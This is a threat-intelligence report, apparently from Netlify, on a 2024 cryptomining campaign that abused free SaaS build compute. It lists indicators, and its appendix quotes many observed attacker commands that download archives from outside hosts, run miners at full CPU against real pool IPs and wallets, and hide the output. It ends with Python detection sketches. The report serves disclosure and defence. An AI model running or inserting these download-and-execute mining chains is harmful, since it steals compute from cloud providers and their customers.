In recent months, the threat intelligence team at Netlify has observed an abusive cryptominer campaign targeting the SaaS industry. The aim of the campaign has been to mine cryptocurrencies optimized for CPU-based mining by abusing cloud SaaS infrastructure. The goal of this report is to share details about the observed campaign with the wider information security community, so companies can enhance their defenses against such abuse.
Netlify is committed to uncovering threats that affect the wider industry. Our hope is that the protections we employ to secure our customers’ data will be used by our partners and colleagues throughout the industry to make the web a safer place for all.
Campaign timeframe
The cryptomining campaign discussed in this report was found to be operating in several waves of activity, the first ramping up slowly throughout September 2024, peaking and pausing around the beginning of October. Several waves of quicker ramp-ups were observed beginning mid-October into early November, ceasing completely around November 10, 2024.
Based on the wallet addresses associated with the campaign (discussed below), activity from this campaign has likely occurred in some form since July 2021, with a larger spike in activity seen throughout 2023 and 2024.
An evolving campaign
During the recently observed waves of the campaign, seven repositories have been used to download and execute cryptomining binaries on target systems. Over the course of the campaign the execution stages evolved several times, likely in an attempt to evade detection. Ultimately, execution has consisted of downloading a cryptominer binary and running said binary with parameters pointed to one of seven wallets and four IPv4 addresses associated with the campaign. During the recent waves of activity, mining was centered around TideCoin, later shifting to VerusCoin. Execution payloads have varied from one to three stages throughout the observed campaign.
The following illustration describes the campaign’s execution strategy at a high level. A detailed description of all discovered execution stages and variations is included in the appendix of this report.
Associated email address and domains
Analysis has uncovered more than 3200 email addresses associated with the cryptominer campaign. Fewer than 250 of these were Gmail and Office 365 addresses; the majority were associated with six custom domain names. Details of these domains are included in the appendix of this report. Email addresses used for account signups followed the pattern `prefix`+`random_string`@`domain`[.]`com`. The plus sign (+) is a common sub-addressing method supported by many email providers, allowing for multiple unique email addresses that act as extensions of the primary email address.
In total, 46 unique email addresses were used to generate the approximately 3200 sub-addressed email addresses. It is assumed that the creation of multiple accounts was attempted in order to produce greater concurrent CPU mining capacity.
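One way to surface this sign-up pattern is to collapse each address to its base mailbox and count how many distinct `+` tags were registered against it. The following is an added example, not Netlify's code; the function names, the `min_tags` threshold and the sample addresses (placeholder domains) are assumptions.

```python
from collections import defaultdict

def split_subaddress(email):
    """Return (base_address, tag); tag is None when no '+' sub-address is present."""
    local, at, domain = email.strip().lower().rpartition("@")
    base_local, plus, tag = local.partition("+")
    if not at or not base_local or not domain:
        raise ValueError(f"not an email address: {email!r}")
    return f"{base_local}@{domain}", (tag if plus and tag else None)

def cluster_signups(emails, min_tags=3):
    """Map each base address to its distinct sub-address tags, keeping only
    bases that were used with at least `min_tags` different tags."""
    tags_by_base = defaultdict(set)
    for email in emails:
        try:
            base, tag = split_subaddress(email)
        except ValueError:
            continue  # malformed input is skipped, not counted
        if tag:
            tags_by_base[base].add(tag)
    flagged = {b: sorted(t) for b, t in tags_by_base.items() if len(t) >= min_tags}
    # Largest clusters first, so the most reused mailbox is reviewed first.
    return dict(sorted(flagged.items(), key=lambda kv: (-len(kv[1]), kv[0])))

def domain_totals(clusters):
    """Count flagged sub-addressed sign-ups per email domain."""
    totals = defaultdict(int)
    for base, tags in clusters.items():
        totals[base.rpartition("@")[2]] += len(tags)
    return dict(totals)

# Constructed sign-up log (placeholder domains, not indicators from the report).
SIGNUPS = [
    "builder+x7f3kq@example.com",
    "builder+p09zla@example.com",
    "Builder+M4ttq1@Example.com",   # case differences collapse to one mailbox
    "builder+x7f3kq@example.com",   # repeated tag counts once
    "deploy+aa11@example.com",
    "deploy+bb22@example.com",
    "deploy+cc33@example.com",
    "deploy+dd44@example.com",
    "alice+newsletter@example.org", # single tag: ordinary sub-addressing
    "bob@example.net",
    "not-an-email",
]

if __name__ == "__main__":
    clusters = cluster_signups(SIGNUPS)
    for base, tags in clusters.items():
        print(f"{base}: {len(tags)} sub-addressed sign-ups")
    print(domain_totals(clusters))
```

A single tag per mailbox is normal user behaviour, so the threshold should be tuned against a platform's own baseline before it gates sign-ups.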
Activity associated with these email addresses has originated from a variety of IP address blocks, with 74% being associated with various cloud providers and 64% being associated with Microsoft cloud networks. The following table describes the organizational ownership of IP address blocks discovered to be originating traffic for the abusive email addresses.
Organization | Account signup occurrences |
---|---|
Microsoft | 2442 |
Pt Telkom Indonesia | 383 |
Protonvpn | 64 |
Datacamp | 60 |
OVH | 16 |
Leaseweb | 13 |
Other | 274 |
How successful has their campaign against the industry been?
A total of seven active wallets were used in the campaign, with mining activities focused on VerusCoin, TideCoin, and Sugarchain, all of which are cryptocurrencies designed to be mined on CPU-based hardware. An eighth wallet was also identified in the format of a VerusCoin blockchain hash, but its address could not be found on the VerusCoin blockchain explorer.
In total across the lifetime of all wallets, around $6,500 in cryptocurrency was mined, based on the conversion rates at the time of this writing in December 2024. It is estimated, based on the activity volume of these wallets, that the campaign may have cost upwards of $20,000 - $30,000 a month in cloud spend during months when it was active. That total represents wasted spend across all victims targeted in this cryptomining campaign. Since many cloud platforms offer various free-tier plans with access to some level of cloud compute resources, the compute cost to the abusive campaign is likely close to $0.
A summary of the wallets discovered is as follows:
Wallet | Coin | Earliest transaction | Total balance transfers * | USD equivalent * |
---|---|---|---|---|
RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii | VerusCoin | 2021-07-21 | 127.40519181 VRSC | $806.47 |
RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c | VerusCoin | 2023-09-10 | 429.83822009 VRSC | $2,720.88 |
RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs | VerusCoin | 2024-10-13 | 0.00293549 VRSC | $0.02 |
TWmRFcspf257KLgehukxHPdc1pf6g8PDz9 | TideCoin | 2023-03-10 | 9214.75307631 TDC | $1,773.41 |
TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW | TideCoin | 2024-10-02 | 1446.54011315 TDC | $278.39 |
sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp | SugarChain | 2024-07-21 | 1326346.16288581 SUGAR | $346.27 |
sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj | SugarChain | 2024-10-26 | 2226232.43760123 SUGAR | $581.20 |
* The total wallet balance transfers and USD rate conversions may change over time.
Conclusion
This report discusses a cryptominer campaign aimed at abusing cloud compute resources. This particular campaign appears to have been active as early as 2021, with a large uptick in activity taking place throughout 2023 and 2024. Following this conclusion, additional technical details about the campaign are provided as a resource to information security teams tasked with defending against such abuse.
Questions about this report can be directed to Netlify Security at security@netlify.com.
Appendix: Additional technical details
Repositories associated with the cryptominer campaign
Repository | Occurrences observed |
---|---|
bitbucket[.]org/betbeyw/titied | 163,225 |
gitlab[.]com/mantap7091041/node | 129,570 |
bitbucket[.]org/awrbtaehtaey/bluise | 19,304 |
gitlab[.]com/mantap7091041/gas | 5,731 |
bitbucket[.]org/oaebthoae/bluise | 4,367 |
gitlab[.]com/mantap7091041/nodejs | 487 |
bitbucket[.]org/dtmdtn/bluise | 45 |
Email domains used in the cryptominer campaign
Email domain | Occurrences observed | Domain registrar | Domain registration date |
---|---|---|---|
butyusa[.]com | 1517 | Hostinger | 2023-05-23 |
gyuil[.]com | 801 | WebNIC | 2024-02-04 |
gimaul[.]com | 343 | WebNIC | 2024-01-31 |
qmaul[.]com | 247 | IDWebHost | 2023-12-25 |
gmail[.]com | 211 | n/a | n/a |
zaknim[.]com | 45 | Hostinger | 2023-07-17 |
outlook[.]com | 29 | n/a | n/a |
gsweety[.]com | 7 | WebNIC | 2024-01-26 |
IPv4 addresses associated with the cryptominer campaign
IPv4 address | ASN | Location |
---|---|---|
8.215.4.141 | AS45102 Alibaba (US) Technology Co., Ltd. | Jakarta, Indonesia |
8.219.2.132 | AS45102 Alibaba (US) Technology Co., Ltd. | Jakarta, Indonesia |
47.236.252.96 | AS45102 Alibaba (US) Technology Co., Ltd. | Singapore |
178.128.218.13 | AS14061 DigitalOcean, LLC | Singapore |
Cryptominer binaries used in the campaign
Binary | Coin | SHA1 | Identifier |
---|---|---|---|
hell | VerusCoin | 86cdddf21f0b3071dcff753fd9db19012fd132f6 | ---------------------------------------------------------------------- Hellminer 0.59.1 [VerusHash 2.2 + PBaaS] Linux ---------------------------------------------------------------------- |
capeu | TideCoin | 3b8821981d55d791b0283098c7c827450f69ce19 | ********** cpuminer-rplant 5.0.36L-sse2 *********** |
cjava | TideCoin | d7445ca0d10b6a89cf6eeaf056081bc7daf18d26 | ********** cpuminer-rplant 5.0.27L-avx2 *********** |
sumaker | SugarChain | 5b1855a378dfba329d60764788d52eba556545c7 | *** sugarmaker 2.5.0-sugar4 by Kanon *** Multi-threaded CPU miner for Sugarchain and other Yespower variants |
Detailed view of the execution stages used in the cryptominer campaign
Repository: git@bitbucket[.]org:awrbtaehtaey/bluise
Date Range: 2024-11-05 to 2024-11-08
Associated Wallets:
- RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
- RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c
Coins Mined:
- VerusCoin
Endpoints:
- stratum+tcp://8.219.2.132:80
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate
Stage 2: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> node info.js && yarn generate
>> yarn generate && node info.js
>> node info.js
Stage 2: Source: node info.js
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 1m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
Stage 3: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> node info.js
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
Stage 2: Source: node info.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
Stage 3: Source: ./nano
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
Repository: git@bitbucket[.]org:oaebthoae/bluise
Date Range: 2024-11-05 to 2024-11-08
Associated Wallets:
- RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
- RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c
Coins Mined:
- VerusCoin
Endpoints:
- stratum+tcp://8.219.2.132:80
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate
Stage 2: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> node info.js && yarn generate
>> yarn generate && node info.js
>> node info.js
Stage 2: Source: node info.js
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 1m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
Stage 3: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> node info.js
Stage 2: Source: node info.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
Stage 3: Source: ./nano
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
Repository: git@bitbucket[.]org:betbeyw/titied
Date Range: 2024-10-22 to 2024-11-05
Associated Wallets:
- RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c
- RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
- sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj
- TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW
Coins Mined:
- SugarChain
- TideCoin
- VerusCoin
Endpoints:
- 178.128.218.13:80
- stratum+tcp://8.215.4.141:443
- stratum+tcp://8.219.2.132:80
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> npm run build && ./next
>> npm run build && chmod +x next && ./next
>> chmod +x next && ./next
Stage 2: Source: ./next
Commands observed:
- Bash script:
wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz
echo "Downloaded sumaker"
tar -xf titied.tar.gz
echo "Running sumaker for 2 minutes"
timeout 10m ./gas > /dev/null 2>&1
echo "sumaker finished, starting npm run build"
npm run build
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
Variation B
Stage 1: Source: CI/CD
>> node data.js
Stage 2: Source: node data.js
>> wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz && tar -xf titied.tar.gz && timeout 10m ./gas > /dev/null 2>&1
Stage 3: Source: ./gas
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://gitlab[.]com/maximus.sale1/file/-/raw/main/sumaker.tar.gz && tar -xf sumaker.tar.gz && timeout 10m ./gas > /dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj.lol -t $(nproc --all)
Variation D
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
Stage 3: Source: ./nano
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
Variation E
Stage 1: Source: CI/CD
Commands observed:
>> node data.js && npm run build
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz && tar -xf titied.tar.gz && timeout 15m ./gas > /dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
Variation F
Stage 1: Source: CI/CD
Commands observed:
>> node data.js && npm run build
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
Stage 3: Source: ./nano
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
Variation G
Stage 1: Source: CI/CD
Commands observed:
>> node data.js && npm run build
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) > /dev/null 2>&1';
Variation H
Stage 1: Source: CI/CD
Commands observed:
>> npm run build && node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
Stage 3: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Repository: git@gitlab[.]com:mantap7091041/nodejs
Date Range: 2024-09-27 to 2024-11-04
Associated Wallets:
- R9sx8KeC2qeGfpvC4GXiXoxkA5KEYE7wYU
- RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
- sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
- TWmRFcspf257KLgehukxHPdc1pf6g8PDz9
Coins Mined:
- SugarChain
- TideCoin
- VerusCoin
Endpoints:
- 47.236.252.96:443
- 178.128.218.13:80
- stratum+tcp://8.215.4.141:80
- stratum+tcp://8.215.4.141:443
- stratum+tcp://8.219.2.132:80
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
Variation D
Stage 1: Source: CI/CD
Commands observed:
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
Stage 2: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation E
Stage 1: Source: CI/CD
Commands observed:
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
Stage 2: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation F
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget https://gitlab[.]com/mantap7091041/gas/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation G
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation H
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./hell -c stratum+tcp://8.219.2.132:80 -u R9sx8KeC2qeGfpvC4GXiXoxkA5KEYE7wYU.yesss -p x --cpu $(nproc --all) > /dev/null 2>&1
Repository: git@gitlab[.]com:mantap7091041/node
Date Range: 2024-09-27 to 2024-10-28
Associated Wallets:
- RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
- sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
- TWmRFcspf257KLgehukxHPdc1pf6g8PDz9
Coins Mined:
- SugarChain
- TideCoin
- VerusCoin
Endpoints:
- 47.236.252.96:443
- 178.128.218.13:80
- stratum+tcp://8.215.4.141:80
- stratum+tcp://8.215.4.141:443
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
Variation D
Stage 1: Source: CI/CD
Commands observed:
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
Stage 2: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation E
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Repository: git@gitlab[.]com:mantap7091041/gas
Date Range: 2024-09-27 to 2024-10-26
Associated Wallets:
- RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
- sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
- TWmRFcspf257KLgehukxHPdc1pf6g8PDz9
Coins Mined:
- SugarChain
- TideCoin
- VerusCoin
Endpoints:
- 47.236.252.96:443
- 178.128.218.13:80
- stratum+tcp://8.215.4.141:80
- stratum+tcp://8.215.4.141:443
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
Variation D
Stage 1: Source: CI/CD
Commands observed:
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
Stage 2: Source: ./gas
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
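The stage commands listed in this appendix share a few traits regardless of repository: a stratum endpoint or a `-a yespower…` algorithm flag, a `wallet.worker` value passed to `-u`, all cores requested via `$(nproc --all)`, a download-unpack-execute chain, and silenced output. The sketch below scores build-log command lines on those traits; it is an added example, not Netlify's detection logic, and the rule names, weights, threshold and the benign sample commands are assumptions.

```python
import re

# name -> (pattern, weight). Patterns are derived from the commands in this
# appendix; the weights are illustrative assumptions.
RULES = {
    "stratum_endpoint": (re.compile(r"stratum\+tcp://", re.I), 3),
    "miner_algo_flag": (re.compile(r"(?<!\S)-a\s+yespower\w*", re.I), 2),
    "all_cores": (re.compile(r"(?<!\S)(?:-t|--cpu)\s+\$\(nproc(?:\s+--all)?\)"), 2),
    "fetch_then_exec": (re.compile(
        r"\bwget\b[^|;]*&&\s*(?:unzip|tar)\b.*?(?<![\w./])\./[\w.-]+"), 2),
    "wallet_worker_arg": (re.compile(r"(?<!\S)-u\s+[A-Za-z0-9]{26,}\.[\w$()-]+"), 3),
    "silenced_output": (re.compile(r">\s*/dev/null\s+2>&1"), 1),
}

def score_command(cmd):
    """Return (score, [rule names that matched]) for one command line."""
    hits = [name for name, (rx, _) in RULES.items() if rx.search(cmd)]
    return sum(RULES[name][1] for name in hits), hits

def triage(commands, threshold=3):
    """Return (score, hits, command) for commands at or above the threshold,
    highest score first."""
    rows = []
    for cmd in commands:
        score, hits = score_command(cmd)
        if score >= threshold:
            rows.append((score, hits, cmd))
    return sorted(rows, key=lambda row: -row[0])

# Commands copied from this appendix (URLs defanged as in the report).
DOWNLOADER = ("wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official "
              "hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate")
VERUS = ("./hell -c stratum+tcp://8.219.2.132:80 -u "
         "RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)")
TIDE = ("chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u "
        "TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)")
LOADER = "node data.js"

# Constructed benign build commands for contrast.
BENIGN = [
    "npm ci && npm run build",
    "wget -q https://example.com/fonts.zip && unzip fonts.zip && npm run build",
    "make -j $(nproc) > /dev/null 2>&1",
]

if __name__ == "__main__":
    for score, hits, cmd in triage([DOWNLOADER, VERUS, TIDE, LOADER] + BENIGN):
        print(f"{score:>2}  {','.join(hits)}\n    {cmd[:90]}")
```

The TideCoin command has no `stratum+tcp://` prefix and is caught only by the other rules, and a stage-one loader such as `node data.js` scores zero, so the rules need to run against the commands spawned during a build rather than only the configured build command.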